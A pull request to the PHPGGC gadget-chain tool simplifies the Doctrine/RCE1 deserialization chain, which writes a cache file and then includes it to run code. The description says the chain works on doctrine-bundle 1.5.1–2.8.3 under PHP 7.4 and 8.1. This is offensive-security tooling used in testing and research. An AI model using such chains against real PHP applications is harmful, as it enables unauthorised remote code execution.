### PR TITLE
update Doctrine/RCE1

### DIFF
--- a/gadgetchains/Doctrine/RCE/1/chain.php
+++ b/gadgetchains/Doctrine/RCE/1/chain.php
@@ -59,7 +59,6 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode
             $firstCacheItem = new TypedCacheItem();
             $secondCacheItem = new TypedCacheItem();
         }
-        echo phpversion();
 
         /* File write */
         $obj_write = new CacheAdapter();
@@ -71,12 +70,9 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode
         
         /* File inclusion */
         $obj_include = new CacheAdapter();
-        $proxyAdapter = new ProxyAdapter();
-        $proxyAdapter->pool = new PhpArrayAdapter();
-        $obj_include->cache = $proxyAdapter;
-        $cacheItem = $secondCacheItem;
-        $cacheItem->expiry = 0; // mandatory to go to another branch from CacheAdapter __destruct
-        $obj_include->deferredItems = [$cacheItem];
+        $obj_include->cache = new PhpArrayAdapter();
+        $secondCacheItem->expiry = 0; // mandatory to go to another branch from CacheAdapter __destruct
+        $obj_include->deferredItems = [$secondCacheItem];
         $obj = [1000 => $obj_write, 1001 => 1, 2000 => $obj_include, 2001 => 1];
         return $obj;
     }

--- a/gadgetchains/Doctrine/RCE/1/gadgets.php
+++ b/gadgetchains/Doctrine/RCE/1/gadgets.php
@@ -28,10 +28,6 @@ namespace Symfony\Component\Cache\Adapter
     {
         public $file = "/tmp/aaa.mocksess"; // fixed at the time
     }
-
-    class ProxyAdapter
-    {
-    }
 }
 
 


### PR DESCRIPTION
### Update of the POP chain Doctrine/RCE1
I made some changes and optimized a bit the POP chain.

Here are the test-gc-compatibility traces to show that these modifications did not affect the chain efficiency.
Doctrine/RCE1 works from doctrine/doctrine-bundle version 1.5.1 to version 2.8.3 included.

On PHP 7.4.33 :
![php7_1](https://user-images.githubusercontent.com/110113034/219721832-ad51aaf2-dc8a-4360-8d82-8deca4748478.png)
![php7_2](https://user-images.githubusercontent.com/110113034/219721847-3a810979-bcff-4eae-a5c8-97ee68d7695c.png)
![php7_3](https://user-images.githubusercontent.com/110113034/219721859-82ab4f1b-7528-4c07-bd8a-71273c342ca0.png)

On PHP 8.1.15 :
![8_1](https://user-images.githubusercontent.com/110113034/219722984-96336478-88e7-43b6-9efa-6516c5381aa3.png)
![8_2](https://user-images.githubusercontent.com/110113034/219723013-4a90248d-77bf-420c-9f12-a0ac4fe8e5df.png)
![8_3](https://user-images.githubusercontent.com/110113034/219723025-3332a324-bcef-4bfb-8a5e-026c80bdec3d.png)

